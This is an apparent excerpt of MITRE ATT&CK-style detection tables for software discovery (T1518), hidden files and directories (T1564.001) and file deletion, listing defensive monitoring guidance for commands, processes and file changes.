ID | Data Source | Data Component | Detects |
Monitor executed commands and arguments for actions that could be utilized to unlink, rename, or delete files. | |||
Monitor for unexpected deletion of files from the system |
T1518 - Software Discovery
ID | Data Source | Data Component | Detects |
Monitor executed commands and arguments that may attempt to get a listing of software and software versions that are installed on a system or in a cloud environment. | |||
Monitor for an extracted list of available firewalls and/or their associated settings/rules (ex: Azure Network Firewall CLI Show commands) | |||
Monitor for contextual data about a firewall and activity around it such as name, policy, or status | |||
Monitor for API calls that may attempt to get a listing of software and software versions that are installed on a system or in a cloud environment. | |||
Monitor newly executed processes that may attempt to get a listing of software and software versions that are installed on a system or in a cloud environment. |
T1564.001 - Hidden Files and Directories
ID | Data Source | Data Component | Detects |
Monitor the file system and shell commands for files being created with a leading "." and the Windows command-line use of attrib.exe to add the hidden attribute. | |||
Monitor the file system and shell commands for files being created with a leading "." | |||
Monitor for contextual data about a file, which may include information such as name, the content (ex: signature, headers, or data/media), user/owner, permissions may set files and directories to be hidden to evade detection mechanisms. | |||
Monitor newly executed processes that may set files and directories to be hidden to evade detection mechanisms. |